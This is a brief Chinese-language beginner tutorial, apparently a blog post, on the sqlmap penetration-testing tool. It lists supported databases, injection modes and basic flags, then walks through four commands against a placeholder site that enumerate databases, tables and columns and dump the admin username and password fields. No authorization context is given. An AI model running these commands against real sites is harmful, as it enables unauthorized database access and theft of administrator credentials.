sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。
支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。
sqlmap支持五种不同的注入模式:
UNION query SQL injection(可联合查询注入
Error-based SQL injection(报错型注入)
Boolean-based blind SQL injection(布尔型注入)
Time-based blind SQL injection(基于时间延迟注入)
Stacked queries SQL injection(可多语句查询注入)
基本用法:
-u 使用sqlmap
--dbs 获取数据库名
--tables 获取表名
--columns 获取字段名
--dump 获取字段内容
实战:
1.获取库名
python2 sqlmap.py -u "http://xxx.com" --dbs
成功获取库名
接下来得根据经验,猜他的账户,密码 在哪个库里,或者都进去看看也可以。
2.继续获取表名
python2 sqlmap.py -u "http://xxx.com" -D 库名 --tables
看见admin 看来离目标 不远了
3.获取字段名
python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin --columns
看到admin_name admin _pass 果然就在这
4.获取用户名,密码
python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin -C admin_name,admin_pass --dump
介绍完毕,小白教学,大佬勿喷,谢谢大家。
推荐文章++++